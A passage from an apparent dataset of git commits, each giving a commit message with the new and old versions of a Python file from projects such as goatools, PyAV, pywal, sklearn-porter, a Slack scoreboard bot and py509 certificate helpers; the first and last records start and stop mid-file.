return to_html.cli_command(**kwargs)
def test(self):
# Mock produce_html_for_modules
if 'cnxarchive.to_html' in sys.modules:
del sys.modules['cnxarchive.to_html']
import cnxarchive.to_html as to_html
original_func = to_html.produce_html_for_modules
self.addCleanup(setattr, to_html, 'produce_html_for_modules',
original_func)
self.call_count = 0
def f(*args, **kwargs):
self.call_count += 1
self.args = args
self.kwargs = kwargs
return []
to_html.produce_html_for_modules = f
self.call_target(db_conn_str=DB_CONNECTION_STRING,
id_select_query='SELECT 2',
overwrite_html=False)
# Assert produce_html_for_modules is called
self.assertEqual(self.call_count, 1)
self.assertEqual(str(type(self.args[0])),
"<type 'psycopg2._psycopg.connection'>")
self.assertEqual(self.args[1], 'SELECT 2')
self.assertEqual(self.args[2], False)
self.assertEqual(self.kwargs, {})
| agpl-3.0 | Python |
e20f0d3ada72cb21185ca0c3c1d22a77ee254de0 | fix rogue tab | lileiting/goatools,tanghaibao/goatools,tanghaibao/goatools,lileiting/goatools | tests/test_get_paths.py | tests/test_get_paths.py | import sys
import os
from goatools.obo_parser import GODag
ROOT = os.path.dirname(os.path.abspath(__file__)) + "/data/"
def print_paths(paths, PRT=sys.stdout):
for path in paths:
PRT.write('\n')
for GO in path:
PRT.write('{}\n'.format(GO))
def chk_results(actual_paths, expected_paths):
for actual_path in actual_paths:
# GOTerm -> list of Strings
actual = [GO.id for GO in actual_path]
if actual not in expected_paths:
raise Exception('ACTUAL {} NOT FOUND IN EXPECTED RESULTS\n'.format(actual))
def test_paths_to_top():
dag = GODag(ROOT + "mini_obo.obo")
expected_paths = [['GO:0000001', 'GO:0000002', 'GO:0000005', 'GO:0000010'],
['GO:0000001', 'GO:0000003', 'GO:0000005', 'GO:0000010'],
['GO:0000001', 'GO:0000003', 'GO:0000006', 'GO:0000008', 'GO:0000010']]
actual_paths = dag.paths_to_top("GO:0000010")
chk_results(actual_paths, expected_paths)
print_paths(actual_paths)
| import sys
import os
from goatools.obo_parser import GODag
ROOT = os.path.dirname(os.path.abspath(__file__)) + "/data/"
def print_paths(paths, PRT=sys.stdout):
for path in paths:
PRT.write('\n')
for GO in path:
PRT.write('{}\n'.format(GO))
def chk_results(actual_paths, expected_paths):
for actual_path in actual_paths:
# GOTerm -> list of Strings
actual = [GO.id for GO in actual_path]
if actual not in expected_paths:
raise Exception('ACTUAL {} NOT FOUND IN EXPECTED RESULTS\n'.format(actual))
def test_paths_to_top():
dag = GODag(ROOT + "mini_obo.obo")
expected_paths = [['GO:0000001', 'GO:0000002', 'GO:0000005', 'GO:0000010'],
['GO:0000001', 'GO:0000003', 'GO:0000005', 'GO:0000010'],
['GO:0000001', 'GO:0000003', 'GO:0000006', 'GO:0000008', 'GO:0000010']]
actual_paths = dag.paths_to_top("GO:0000010")
chk_results(actual_paths, expected_paths)
print_paths(actual_paths)
| bsd-2-clause | Python |
e42690a6f225952ddb6417edc90e27892c18d2a2 | Move api to root. | EmilStenstrom/json-tagger,EmilStenstrom/json-tagger,EmilStenstrom/json-tagger,EmilStenstrom/json-tagger,EmilStenstrom/json-tagger | api/main.py | api/main.py | from bottle import route, request, response, run, view
from collections import OrderedDict
from parser import parse_response
from server import query_server
import bottle
import json
import os
@route('/')
@view('api/views/index')
def index():
site = "%s://%s" % (request.urlparts.scheme, request.urlparts.netloc)
return {"site": site}
@route('/tag', method=["get", "post"])
def tag():
# Support posting data both via forms and via POST body
data = request.POST.get("data", request.body.getvalue())
if not data:
return {"error": "No data posted"}
raw_text = query_server(data)
sentences, entities = parse_response(raw_text)
response.content_type = "application/json"
pretty = request.POST.get("pretty", False)
json_kwargs = {"separators": (',', ':')}
if pretty:
json_kwargs = {"indent": 4, "separators": (', ', ': ')}
return json.dumps(OrderedDict([
("sentences", sentences),
("entities", entities),
]), **json_kwargs)
if __name__ == "__main__":
environment = os.environ.get("ENVIRONMENT", None)
assert environment, "Needs $ENVIRONMENT variable set"
if environment == "development":
print "RUNNING IN DEVELOPMENT MODE"
bottle.debug(True)
bottle.TEMPLATES.clear()
run(host='localhost', port=8000, reloader=True)
elif environment == "production":
print "RUNNING IN PRODUCTION MODE"
run(host="0.0.0.0", port=int(os.environ.get("PORT", 5000)))
else:
assert False, "That's not a valid $ENVIRONMENT"
| from bottle import route, request, response, run, view
from collections import OrderedDict
from parser import parse_response
from server import query_server
import bottle
import json
import os
@route('/api/')
@view('api/views/index')
def index():
site = "%s://%s" % (request.urlparts.scheme, request.urlparts.netloc)
return {"site": site}
@route('/api/tag', method=["get", "post"])
def tag():
# Support posting data both via forms and via POST body
data = request.POST.get("data", request.body.getvalue())
if not data:
return {"error": "No data posted"}
raw_text = query_server(data)
sentences, entities = parse_response(raw_text)
response.content_type = "application/json"
pretty = request.POST.get("pretty", False)
json_kwargs = {"separators": (',', ':')}
if pretty:
json_kwargs = {"indent": 4, "separators": (', ', ': ')}
return json.dumps(OrderedDict([
("sentences", sentences),
("entities", entities),
]), **json_kwargs)
if __name__ == "__main__":
environment = os.environ.get("ENVIRONMENT", None)
assert environment, "Needs $ENVIRONMENT variable set"
if environment == "development":
print "RUNNING IN DEVELOPMENT MODE"
bottle.debug(True)
bottle.TEMPLATES.clear()
run(host='localhost', port=8000, reloader=True)
elif environment == "production":
print "RUNNING IN PRODUCTION MODE"
run(host="0.0.0.0", port=int(os.environ.get("PORT", 5000)))
else:
assert False, "That's not a valid $ENVIRONMENT"
| mit | Python |
ee3b712611ed531843134ef4ce94cb45c726c127 | Fix filename creation in csv export action | limbera/django-nap,MarkusH/django-nap | nap/extras/actions.py | nap/extras/actions.py |
from django.http import StreamingHttpResponse
from django.utils.encoding import force_text
from .models import modelserialiser_factory
from .simplecsv import CSV
class ExportCsv(object):
def __init__(self, serialiser=None, label=None, **opts):
self.serialiser = serialiser
self.opts = opts
if label:
self.short_description = label
def __call__(self, admin, request, queryset):
if self.serialiser is None:
ser_class = modelserialiser_factory(
'%sSerialiser' % admin.__class__.__name__,
admin.model,
**self.opts
)
else:
ser_class = self.serialiser
def inner(ser):
csv = CSV(fields=ser._fields.keys())
yield csv.write_headers()
for obj in queryset:
data = {
key: force_text(val)
for key, val in ser.object_deflate(obj).items()
}
yield csv.write_dict(data)
response = StreamingHttpResponse(inner(ser_class()), content_type='text/csv')
filename = self.opts.get('filename', 'export_{classname}.csv')
if callable(filename):
filename = filename(admin)
else:
filename = filename.format(
classname=admin.__class__.__name__,
model=admin.model._meta.module_name,
app_label=admin.model._meta.app_label,
)
response['Content-Disposition'] = 'attachment; filename=%s' % filename
return response
|
from django.http import StreamingHttpResponse
from django.utils.encoding import force_text
from .models import modelserialiser_factory
from .simplecsv import CSV
class ExportCsv(object):
def __init__(self, serialiser=None, label=None, **opts):
self.serialiser = serialiser
self.opts = opts
if label:
self.short_description = label
def __call__(self, admin, request, queryset):
if self.serialiser is None:
ser_class = modelserialiser_factory(
'%sSerialiser' % admin.__class__.__name__,
admin.model,
**self.opts
)
else:
ser_class = self.serialiser
def inner(ser):
csv = CSV(fields=ser._fields.keys())
yield csv.write_headers()
for obj in queryset:
data = {
key: force_text(val)
for key, val in ser.object_deflate(obj).items()
}
yield csv.write_dict(data)
response = StreamingHttpResponse(inner(ser_class()), content_type='text/csv')
filename = admin.csv_
response['Content-Disposition'] = 'attachment; filename=%s' % filename
return response
| bsd-3-clause | Python |
1e03772e601fb6ed0eb6aa59555af61c29b2650f | remove fungible in parent class constructor call | nedlowe/amaas-core-sdk-python,amaas-fintech/amaas-core-sdk-python,amaas-fintech/amaas-core-sdk-python,paul-rs/amaas-core-sdk-python,nedlowe/amaas-core-sdk-python,paul-rs/amaas-core-sdk-python | amaascore/assets/cfd.py | amaascore/assets/cfd.py | from __future__ import absolute_import, division, print_function, unicode_literals
from datetime import datetime, date
from dateutil import parser
from amaascore.assets.derivative import Derivative
class ContractForDifference(Derivative):
def __init__(self, asset_manager_id, asset_id, asset_issuer_id=None, asset_status='Active', display_name='',
description='', country_id=None, venue_id=None, currency=None, issue_date=None,
links=None, references=None,
*args, **kwargs):
super(ContractForDifference, self).__init__(asset_manager_id=asset_manager_id, asset_id=asset_id,
asset_issuer_id=asset_issuer_id,
asset_status=asset_status, display_name=display_name,
description=description,
country_id=country_id, venue_id=venue_id, issue_date=issue_date,
currency=currency, links=links,
references=references,
*args, **kwargs)
| from __future__ import absolute_import, division, print_function, unicode_literals
from datetime import datetime, date
from dateutil import parser
from amaascore.assets.derivative import Derivative
class ContractForDifference(Derivative):
def __init__(self, asset_manager_id, asset_id, asset_issuer_id=None, asset_status='Active', display_name='',
description='', country_id=None, venue_id=None, currency=None, issue_date=None,
links=None, references=None,
*args, **kwargs):
super(ContractForDifference, self).__init__(asset_manager_id=asset_manager_id, asset_id=asset_id,
fungible=False, asset_issuer_id=asset_issuer_id,
asset_status=asset_status, display_name=display_name,
description=description,
country_id=country_id, venue_id=venue_id, issue_date=issue_date,
currency=currency, links=links,
references=references,
*args, **kwargs)
| apache-2.0 | Python |
63eaf0faf56a70fadbd37f0acac6f5e61c7b19eb | Change sleep function to the end to do repeat everytime | felipebhz/checkdns | checkdns.py | checkdns.py | # coding=utf8
# 31.220.16.242
# 216.58.222.46
import socket
import time
import webbrowser
def checkdns():
print time.ctime()
retorno = True
try:
ip = socket.gethostbyname('google.com')
print ("O IP do host verificado é: " + ip)
if ip == "216.58.22.46":
retorno = False
url = 'http://www.google.com.br/'
webbrowser.open_new_tab(url)
else:
print "DNS ainda não atualizado. Aguardando 30s."
except socket.gaierror:
print "Nenhum host definido para o domínio. Aguardando 30s."
return retorno
condicao = True
while condicao:
condicao = checkdns()
time.sleep( 30 ) | # coding=utf8
# 31.220.16.242
# 216.58.222.46
import socket
import time
import webbrowser
def checkdns():
print time.ctime()
retorno = True
try:
ip = socket.gethostbyname('google.com')
print ("O IP do host verificado é: " + ip)
if ip == "216.58.222.46":
retorno = False
url = 'http://www.google.com.br/'
webbrowser.open_new_tab(url)
else:
print "DNS ainda não atualizado. Aguardando 30s."
time.sleep( 30 )
except socket.gaierror:
print "Nenhum host definido para o domínio. Aguardando 30s."
time.sleep( 30 )
return retorno
condicao = True
while condicao:
condicao = checkdns() | mit | Python |
4c819629552a31748e4bb266c1c13726276d7944 | Use cross version compatible iteration | peterbrittain/asciimatics,peterbrittain/asciimatics | tests/test_renderers.py | tests/test_renderers.py | import unittest
from asciimatics.renderers import StaticRenderer
from asciimatics.screen import Screen
class TestRenderers(unittest.TestCase):
def test_static_renderer(self):
"""
Check that the base static renderer class works.
"""
# Check basic API for a renderer...
renderer = StaticRenderer(images=["A\nB", "C "])
# Max height should match largest height of any entry.
self.assertEqual(renderer.max_height, 2)
# Max width should match largest width of any entry.
self.assertEqual(renderer.max_width, 3)
# Images should be the parsed versions of the original strings.
images = renderer.images
self.assertEqual(next(images), ["A", "B"])
self.assertEqual(next(images), ["C "])
# String presentation should be the first image as a printable string.
self.assertEqual(str(renderer), "A\nB")
def test_colour_maps(self):
"""
Check that the ${} syntax is parsed correctly.
"""
# Check the ${fg, attr} variant
renderer = StaticRenderer(images=["${3,1}*"])
output = renderer.rendered_text
self.assertEqual(len(output[0]), len(output[1]))
self.assertEqual(output[0], ["*"])
self.assertEqual(output[1][0][0], (Screen.COLOUR_YELLOW, Screen.A_BOLD))
# Check the ${fg} variant
renderer = StaticRenderer(images=["${1}XY${2}Z"])
output = renderer.rendered_text
self.assertEqual(len(output[0]), len(output[1]))
self.assertEqual(output[0], ["XYZ"])
self.assertEqual(output[1][0][0], (Screen.COLOUR_RED, 0))
self.assertEqual(output[1][0][1], (Screen.COLOUR_RED, 0))
self.assertEqual(output[1][0][2], (Screen.COLOUR_GREEN, 0))
if __name__ == '__main__':
unittest.main()
| import unittest
from asciimatics.renderers import StaticRenderer
from asciimatics.screen import Screen
class TestRenderers(unittest.TestCase):
def test_static_renderer(self):
"""
Check that the base static renderer class works.
"""
# Check basic API for a renderer...
renderer = StaticRenderer(images=["A\nB", "C "])
# Max height should match largest height of any entry.
self.assertEqual(renderer.max_height, 2)
# Max width should match largest width of any entry.
self.assertEqual(renderer.max_width, 3)
# Images should be the parsed versions of the original strings.
images = renderer.images
self.assertEqual(images.__next__(), ["A", "B"])
self.assertEqual(images.__next__(), ["C "])
# String presentation should be the first image as a printable string.
self.assertEqual(str(renderer), "A\nB")
def test_colour_maps(self):
"""
Check that the ${} syntax is parsed correctly.
"""
# Check the ${fg, attr} variant
renderer = StaticRenderer(images=["${3,1}*"])
output = renderer.rendered_text
self.assertEqual(len(output[0]), len(output[1]))
self.assertEqual(output[0], ["*"])
self.assertEqual(output[1][0][0], (Screen.COLOUR_YELLOW, Screen.A_BOLD))
# Check the ${fg} variant
renderer = StaticRenderer(images=["${1}XY${2}Z"])
output = renderer.rendered_text
self.assertEqual(len(output[0]), len(output[1]))
self.assertEqual(output[0], ["XYZ"])
self.assertEqual(output[1][0][0], (Screen.COLOUR_RED, 0))
self.assertEqual(output[1][0][1], (Screen.COLOUR_RED, 0))
self.assertEqual(output[1][0][2], (Screen.COLOUR_GREEN, 0))
if __name__ == '__main__':
unittest.main()
| apache-2.0 | Python |
90b991c19ef5249a09410b19c33f2c8bfe9b5ca7 | Install pypy for proper architechture. | alex/braid,alex/braid | braid/pypy.py | braid/pypy.py | import re
from os import path
from fabric.api import cd, task, sudo, abort
from braid import info
from braid.utils import fails
pypyURLs = {
'x86_64': 'https://bitbucket.org/pypy/pypy/downloads/pypy-2.0.2-linux64.tar.bz2',
'x86': 'https://bitbucket.org/pypy/pypy/downloads/pypy-2.0.2-linux.tar.bz2',
}
pypyDir = '/opt/pypy-2.0'
setuptoolsURL = 'http://peak.telecommunity.com/dist/ez_setup.py'
pipURL = 'https://raw.github.com/pypa/pip/master/contrib/get-pip.py'
@task
def install():
sudo('/bin/mkdir -p /opt')
if fails('/usr/bin/id {}'.format('pypy')):
sudo('/usr/sbin/useradd --home-dir {} --gid bin '
'-M --system --shell /bin/false '
'pypy'.format(pypyDir))
else:
sudo('/usr/sbin/usermod --home {} pypy'.format(pypyDir))
with cd('/opt'):
if info.arch() == 'x86_64':
pypyURL = pypyURLs['x86_64']
elif re.match('i.86', info.arch()):
pypyURL = pypyURLs['x86']
else:
abort("Can't install pypy on unknown architecture.")
for url in pypyURL, setuptoolsURL, pipURL:
sudo('/usr/bin/wget -nc {}'.format(url))
sudo('/bin/tar xf {}'.format(path.basename(pypyURL)))
for url in setuptoolsURL, pipURL:
sudo('~pypy/bin/pypy {}'.format(path.basename(url)))
sudo('~pypy/bin/pip install pyopenssl')
sudo('~pypy/bin/pip install svn+svn://svn.twistedmatrix.com/svn/Twisted/trunk/')
| from os import path
from fabric.api import cd, task, sudo
from braid import fails
pypyURL = 'https://bitbucket.org/pypy/pypy/downloads/pypy-2.0-linux64.tar.bz2'
setuptoolsURL = 'http://peak.telecommunity.com/dist/ez_setup.py'
pipURL = 'https://raw.github.com/pypa/pip/master/contrib/get-pip.py'
pypyDir = '/opt/pypy-2.0'
@task
def install():
sudo('/bin/mkdir -p /opt')
if fails('/usr/bin/id {}'.format('pypy')):
sudo('/usr/sbin/useradd --home-dir {} --gid bin '
'-M --system --shell /bin/false '
'pypy'.format(pypyDir))
else:
sudo('/usr/sbin/usermod --home {} pypy'.format(pypyDir))
with cd('/opt'):
for url in pypyURL, setuptoolsURL, pipURL:
sudo('/usr/bin/wget -nc {}'.format(url))
sudo('/bin/tar xf {}'.format(path.basename(pypyURL)))
for url in setuptoolsURL, pipURL:
sudo('~pypy/bin/pypy {}'.format(path.basename(url)))
sudo('~pypy/bin/pip install pyopenssl')
sudo('~pypy/bin/pip install svn+svn://svn.twistedmatrix.com/svn/Twisted/trunk/')
| mit | Python |
25030673476f9eb99a4eff980d7bb050fdaa2568 | Print size of result lists in check_files | symbooglix/boogie-runner,symbooglix/boogie-runner | analysis/check_files.py | analysis/check_files.py | #!/usr/bin/env python
# vim: set sw=2 ts=2 softtabstop=2 expandtab:
import argparse
import os
import logging
import sys
import yaml
try:
# Try to use libyaml which is faster
from yaml import CLoader as Loader, CDumper as Dumper
except ImportError:
# fall back on python implementation
from yaml import Loader, Dumper
def main(args):
parser = argparse.ArgumentParser()
parser.add_argument("-l","--log-level",type=str, default="info", dest="log_level", choices=['debug','info','warning','error'])
parser.add_argument('first_yml', type=argparse.FileType('r'))
parser.add_argument('second_yml', type=argparse.FileType('r'))
pargs = parser.parse_args(args)
logLevel = getattr(logging, pargs.log_level.upper(),None)
logging.basicConfig(level=logLevel)
firstResults = yaml.load(pargs.first_yml, Loader=Loader)
secondResults = yaml.load(pargs.second_yml, Loader=Loader)
assert isinstance(firstResults, list)
assert isinstance(secondResults, list)
if len(firstResults) == 0:
logging.error('First Result list is empty')
return 1
if len(secondResults) == 0:
logging.error('Second Result list is empty')
return 1
print("# of results in first {}".format(len(firstResults)))
print("# of results in second {}".format(len(secondResults)))
# Create sets of used files
programsInFirst = set()
programsInSecond = set()
for r in firstResults:
programsInFirst.add(r['program'])
for r in secondResults:
programsInSecond.add(r['program'])
resultMissingFromSecond= [ ]
resultMissingFromFirst=[ ]
# Check for files missing in second
for r in firstResults:
if not (r['program'] in programsInSecond):
resultMissingFromSecond.append(r)
logging.warning('Program {} is missing from second but present in first'.format(r['program']))
# Check for files missing in first
for r in secondResults:
if not (r['program'] in programsInFirst):
resultMissingFromFirst.append(r)
logging.warning('Program {} is missing from first but present in second'.format(r['program']))
print("# of programs missing from second but present in first: {}".format(len(resultMissingFromSecond)))
print("# of programs missing from first but present in second: {}".format(len(resultMissingFromFirst)))
print("")
print("# Missing from second")
for r in resultMissingFromSecond:
print(r)
print("# Missing from first")
for r in resultMissingFromFirst:
print(r)
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
| #!/usr/bin/env python
# vim: set sw=2 ts=2 softtabstop=2 expandtab:
import argparse
import os
import logging
import sys
import yaml
try:
# Try to use libyaml which is faster
from yaml import CLoader as Loader, CDumper as Dumper
except ImportError:
# fall back on python implementation
from yaml import Loader, Dumper
def main(args):
parser = argparse.ArgumentParser()
parser.add_argument("-l","--log-level",type=str, default="info", dest="log_level", choices=['debug','info','warning','error'])
parser.add_argument('first_yml', type=argparse.FileType('r'))
parser.add_argument('second_yml', type=argparse.FileType('r'))
pargs = parser.parse_args(args)
logLevel = getattr(logging, pargs.log_level.upper(),None)
logging.basicConfig(level=logLevel)
firstResults = yaml.load(pargs.first_yml, Loader=Loader)
secondResults = yaml.load(pargs.second_yml, Loader=Loader)
assert isinstance(firstResults, list)
assert isinstance(secondResults, list)
if len(firstResults) == 0:
logging.error('First Result list is empty')
return 1
if len(secondResults) == 0:
logging.error('Second Result list is empty')
return 1
# Create set of all used files
programsInFirst = set()
programsInSecond = set()
for r in firstResults:
programsInFirst.add(r['program'])
for r in secondResults:
programsInSecond.add(r['program'])
resultMissingFromSecond= [ ]
resultMissingFromFirst=[ ]
# Check for files missing in second
for r in firstResults:
if not (r['program'] in programsInSecond):
resultMissingFromSecond.append(r)
logging.warning('Program {} is missing from second but present in first'.format(r['program']))
# Check for files missing in first
for r in secondResults:
if not (r['program'] in programsInFirst):
resultMissingFromFirst.append(r)
logging.warning('Program {} is missing from first but present in second'.format(r['program']))
print("# of programs missing from second but present in first: {}".format(len(resultMissingFromSecond)))
print("# of programs missing from first but present in second: {}".format(len(resultMissingFromFirst)))
print("")
print("# Missing from second")
for r in resultMissingFromSecond:
print(r)
print("# Missing from first")
for r in resultMissingFromFirst:
print(r)
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
| bsd-3-clause | Python |
d115c0ceb08a350f7b367f61627ced5ab03df833 | Remove useless space | nok/sklearn-porter | sklearn_porter/language/__init__.py | sklearn_porter/language/__init__.py | # -*- coding: utf-8 -*-
import sklearn_porter.language.c
import sklearn_porter.language.go
import sklearn_porter.language.java
import sklearn_porter.language.js
import sklearn_porter.language.php
import sklearn_porter.language.ruby
LANGUAGES = {
c.KEY: c,
go.KEY: go,
java.KEY: java,
js.KEY: js,
php.KEY: php,
ruby.KEY: ruby
}
__all__ = ['c', 'go', 'java', 'js', 'php', 'ruby', 'LANGUAGES']
| # -*- coding: utf-8 -*-
import sklearn_porter.language.c
import sklearn_porter.language.go
import sklearn_porter.language.java
import sklearn_porter.language.js
import sklearn_porter.language.php
import sklearn_porter.language.ruby
LANGUAGES = {
c.KEY: c,
go.KEY: go,
java.KEY: java,
js.KEY: js,
php.KEY: php,
ruby.KEY: ruby
}
__all__ = ['c', 'go', 'java', 'js', 'php', 'ruby', 'LANGUAGES']
| bsd-3-clause | Python |
3fdad9fb89d70b8d81483b646e16d20f076e0ebd | Test urxvt alpha | dylanaraps/pywal,dylanaraps/pywal,dylanaraps/pywal | tests/test_sequences.py | tests/test_sequences.py | """Test sequence functions."""
import unittest
import unittest.mock
import io
from pywal import sequences
from pywal import util
# Import colors.
COLORS = util.read_file_json("tests/test_files/test_file.json")
class Testsequences(unittest.TestCase):
"""Test the sequence functions."""
def test_set_special(self):
"""> Create special escape sequence."""
result = sequences.set_special(11, COLORS["special"]["background"])
self.assertEqual(result, "\033]11;#1F211E\007")
def test_set_special_alpha(self):
"""> Create special escape sequence with alpha."""
util.Color.alpha_num = 40
result = sequences.set_special(11, COLORS["special"]["background"])
self.assertEqual(result, "\033]11;[40]#1F211E\007")
def test_set_color(self):
"""> Create color escape sequence."""
result = sequences.set_color(11, COLORS["colors"]["color0"])
self.assertEqual(result, "\033]4;11;#1F211E\007")
def test_send_srquences(self):
"""> Send sequences to all open terminals."""
with unittest.mock.patch('sys.stdout', new=io.StringIO()) as fake_out:
sequences.send(COLORS, False)
data = fake_out.getvalue().strip()
self.assertTrue(data.endswith("colors: Set terminal colors"))
if __name__ == "__main__":
unittest.main()
| """Test sequence functions."""
import unittest
import unittest.mock
import io
from pywal import sequences
from pywal import util
# Import colors.
COLORS = util.read_file_json("tests/test_files/test_file.json")
class Testsequences(unittest.TestCase):
"""Test the sequence functions."""
def test_set_special(self):
"""> Create special escape sequence."""
result = sequences.set_special(11, COLORS["special"]["background"])
self.assertEqual(result, "\033]11;#1F211E\007")
def test_set_color(self):
"""> Create color escape sequence."""
result = sequences.set_color(11, COLORS["colors"]["color0"])
self.assertEqual(result, "\033]4;11;#1F211E\007")
def test_send_srquences(self):
"""> Send sequences to all open terminals."""
with unittest.mock.patch('sys.stdout', new=io.StringIO()) as fake_out:
sequences.send(COLORS, False)
data = fake_out.getvalue().strip()
self.assertTrue(data.endswith("colors: Set terminal colors"))
if __name__ == "__main__":
unittest.main()
| mit | Python |
b86348349906c88b6946f757485cf41f909a9a91 | fix subtitle test for newer versions of ffmpeg | PyAV-Org/PyAV,danielballan/PyAV,pupil-labs/PyAV,mcpv/PyAV,xxr3376/PyAV,markreidvfx/PyAV,markreidvfx/PyAV,PyAV-Org/PyAV,markreidvfx/PyAV,danielballan/PyAV,mikeboers/PyAV,mcpv/PyAV,danielballan/PyAV,xxr3376/PyAV,pupil-labs/PyAV,xxr3376/PyAV,mcpv/PyAV,pupil-labs/PyAV,mikeboers/PyAV,pupil-labs/PyAV | tests/test_subtitles.py | tests/test_subtitles.py | import sys
from .common import *
from av.subtitles.subtitle import *
class TestSubtitle(TestCase):
def test_movtext(self):
path = fate_suite('sub/MovText_capability_tester.mp4')
fh = av.open(path)
subs = []
for packet in fh.demux():
try:
subs.extend(packet.decode())
except ValueError:
raise SkipTest
self.assertEqual(len(subs), 3)
self.assertIsInstance(subs[0][0], AssSubtitle)
self.assertIn(subs[0][0].ass, ('Dialogue: 0,0:00:00.97,0:00:02.54,Default,- Test 1.\\N- Test 2.\r\n',
'Dialogue: 0,0:00:00.97,0:00:02.54,Default,,0,0,0,,- Test 1.\\N- Test 2.\r\n'))
def test_vobsub(self):
path = fate_suite('sub/vobsub.sub')
fh = av.open(path)
subs = []
for packet in fh.demux():
try:
subs.extend(packet.decode())
except ValueError:
raise SkipTest
self.assertEqual(len(subs), 43)
sub = subs[0][0]
self.assertIsInstance(sub, BitmapSubtitle)
self.assertEqual(sub.x, 259)
self.assertEqual(sub.y, 379)
self.assertEqual(sub.width, 200)
self.assertEqual(sub.height, 24)
bms = sub.planes
self.assertEqual(len(bms), 1)
if hasattr(__builtins__, 'buffer'):
self.assertEqual(len(buffer(bms[0])), 4800)
if hasattr(__builtins__, 'memoryview'):
self.assertEqual(len(memoryview(bms[0])), 4800)
| import sys
from .common import *
from av.subtitles.subtitle import *
class TestSubtitle(TestCase):
def test_movtext(self):
path = fate_suite('sub/MovText_capability_tester.mp4')
fh = av.open(path)
subs = []
for packet in fh.demux():
try:
subs.extend(packet.decode())
except ValueError:
raise SkipTest
self.assertEqual(len(subs), 3)
self.assertIsInstance(subs[0][0], AssSubtitle)
self.assertEqual(subs[0][0].ass, 'Dialogue: 0,0:00:00.97,0:00:02.54,Default,- Test 1.\\N- Test 2.\r\n')
def test_vobsub(self):
path = fate_suite('sub/vobsub.sub')
fh = av.open(path)
subs = []
for packet in fh.demux():
try:
subs.extend(packet.decode())
except ValueError:
raise SkipTest
self.assertEqual(len(subs), 43)
sub = subs[0][0]
self.assertIsInstance(sub, BitmapSubtitle)
self.assertEqual(sub.x, 259)
self.assertEqual(sub.y, 379)
self.assertEqual(sub.width, 200)
self.assertEqual(sub.height, 24)
bms = sub.planes
self.assertEqual(len(bms), 1)
if hasattr(__builtins__, 'buffer'):
self.assertEqual(len(buffer(bms[0])), 4800)
if hasattr(__builtins__, 'memoryview'):
self.assertEqual(len(memoryview(bms[0])), 4800)
| bsd-3-clause | Python |
4a7484bccc9a92353681fb155f15629fa1059cd1 | Format users | AlexLloyd1/pointy-mcpointface | slackbot/get_scoreboard.py | slackbot/get_scoreboard.py | import logging
from typing import Dict, List, Tuple
from werkzeug.datastructures import ImmutableMultiDict
from database.main import connect, channel_resp
from database.team import check_all_scores
logger = logging.getLogger(__name__)
def get_scoreboard(form: ImmutableMultiDict) -> Dict[str, str]:
logger.debug(f"Scoreboard request: {form}")
team_id = form.get('team_id', '')
with connect() as conn:
scoreboard_list = check_all_scores(conn, team_id)
return channel_resp(_parse_scoreboard(scoreboard_list))
def _parse_scoreboard(scoreboard_list: List[Tuple[str, int]]) -> str:
text = f'Here\'s a list of my favourite people:'
for index, (subject, score) in enumerate(scoreboard_list):
text += f'\n{index+1}. <@{subject}> [{score} point{"s" if score != 1 else ""}]'
if index == 0:
text += ' :crown:'
elif index + 1 == len(scoreboard_list):
text += ' :hankey:'
return text
| import logging
from typing import Dict, List, Tuple
from werkzeug.datastructures import ImmutableMultiDict
from database.main import connect, channel_resp
from database.team import check_all_scores
logger = logging.getLogger(__name__)
def get_scoreboard(form: ImmutableMultiDict) -> Dict[str, str]:
logger.debug(f"Scoreboard request: {form}")
team_id = form.get('team_id', '')
with connect() as conn:
scoreboard_list = check_all_scores(conn, team_id)
return channel_resp(_parse_scoreboard(scoreboard_list))
def _parse_scoreboard(scoreboard_list: List[Tuple[str, int]]) -> str:
text = f'Here\'s a list of my favourite people:'
for index, (subject, score) in enumerate(scoreboard_list):
text += f'\n{index+1}. {subject} [{score} point{"s" if score != 1 else ""}]'
if index == 0:
text += ' :crown:'
elif index + 1 == len(scoreboard_list):
text += ' :hankey:'
return text
| mit | Python |
29bfc1049352f59fca0b625d0ecbc7177fb565c7 | Change default value for certificate location. | sholsapp/py509 | py509/x509.py | py509/x509.py | import socket
import uuid
from OpenSSL import crypto
def make_serial():
"""Make a random serial number."""
return uuid.uuid4().int
def make_pkey(key_type=crypto.TYPE_RSA, key_bits=4096):
"""Make a public/private key pair."""
key = crypto.PKey()
key.generate_key(key_type, key_bits)
return key
def make_certificate_signing_request(pkey, digest='sha512', **name):
"""Make a certificate signing request."""
csr = crypto.X509Req()
subj = csr.get_subject()
subj.C = name.get('C', 'US')
subj.ST = name.get('ST', 'CA')
subj.L = name.get('L', 'Home')
subj.O = name.get('O', 'Home')
subj.OU = name.get('OU', socket.gethostbyname(socket.getfqdn()))
subj.CN = name.get('CN', socket.getfqdn())
csr.set_pubkey(pkey)
csr.set_version(3)
csr.sign(pkey, digest)
return csr
def make_certificate(csr, ca_key, ca_cert, serial, not_before, not_after, digest='sha512', version=2, exts=()):
"""Make a certificate."""
crt = crypto.X509()
crt.set_serial_number(serial)
crt.gmtime_adj_notBefore(not_before)
crt.gmtime_adj_notAfter(not_after)
crt.set_issuer(ca_cert.get_subject())
crt.set_subject(csr.get_subject())
crt.set_pubkey(csr.get_pubkey())
crt.set_version(version)
crt.add_extensions(exts)
crt.sign(ca_key, digest)
return crt
def make_certificate_authority(**name):
"""Make a certificate authority.
A certificate authority can sign certificates. For clients to be able to
validate certificates signed by your certificate authorithy, they must trust
the certificate returned by this function.
"""
key = make_pkey()
csr = make_certificate_signing_request(key, **name)
crt = make_certificate(csr, key, csr, make_serial(), 0, 10 * 365 * 24 * 60 * 60, exts=[crypto.X509Extension(b'basicConstraints', True, b'CA:TRUE')])
return key, crt
| import socket
import uuid
from OpenSSL import crypto
def make_serial():
"""Make a random serial number."""
return uuid.uuid4().int
def make_pkey(key_type=crypto.TYPE_RSA, key_bits=4096):
"""Make a public/private key pair."""
key = crypto.PKey()
key.generate_key(key_type, key_bits)
return key
def make_certificate_signing_request(pkey, digest='sha512', **name):
"""Make a certificate signing request."""
csr = crypto.X509Req()
subj = csr.get_subject()
subj.C = name.get('C', 'US')
subj.ST = name.get('ST', 'CA')
subj.L = name.get('L', 'San Diego')
subj.O = name.get('O', 'Home')
subj.OU = name.get('OU', socket.gethostbyname(socket.getfqdn()))
subj.CN = name.get('CN', socket.getfqdn())
csr.set_pubkey(pkey)
csr.set_version(3)
csr.sign(pkey, digest)
return csr
